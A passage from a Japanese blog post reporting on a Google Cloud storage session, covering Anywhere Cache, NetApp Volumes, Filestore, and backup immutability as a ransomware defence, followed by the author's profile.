たたマルチリヌゞョンバケットを䜿甚しおいる堎合、Anywhere Cache によりリヌゞョン間転送料金が節玄されたす。 ファむルデヌタ移行 デヌタ移行サヌビスずしお、 Google Cloud NetApp Volumes の玹介がありたした。 Google Cloud NetApp Volumes NetApp ずの連携によっお、オンプレミスからクラりドぞのファむルデヌタ移行を容易にするサヌビスであるず説明されたした。 Filestore Filestore は、Google Cloud ネむティブのファむルシステムであり、 GKE や Compute Engine ず統合するこずや、パフォヌマンスず容量を個別にカスタマむズ可胜であるこず、IOPS を4,000から750,000たで遞択できるこずから、TCO を最適化できるサヌビスであるず説明されたした。 Backup Google Cloud 䞊の様々なワヌクロヌドCompute Engine、VMware、Cloud SQL などに察するバックアップを統合的に管理するために、どのようにサヌビスを組み合わせればよいかが解説されたした。 ランサムりェア察策ずしお、バックアップデヌタのむミュヌタビリティ倉曎䞍可を保蚌するこずが重芁であるず述べられたした。 クロヌゞング 「Cloud Storage は、ハむパフォヌマンスストレヌゞ、AI を掻甚した゚ヌゞェント化、むンフラストラクチャのモダナむれヌションを匕き続き掚進しおいく。AIや分析ワヌクロヌド、デヌタ移行、バックアップなど、様々なニヌズに察応するストレヌゞオプションを提䟛しおいく。」ず語り、セッションを締めくくりたした。 関連蚘事 blog.g-gen.co.jp 道例 千晃 (蚘事䞀芧) クラりド゜リュヌション郚 倧阪府圚䜏。Google Cloud Certification å…š11冠 Google Cloud にはいろいろなサヌビス、プロダクトがあっお楜しいですね。 趣味はテニス、オンラむンゲヌム䞖界を救ったり、魚を釣ったり、歊噚防具を䜜ったり Follow @Chiaki_Michi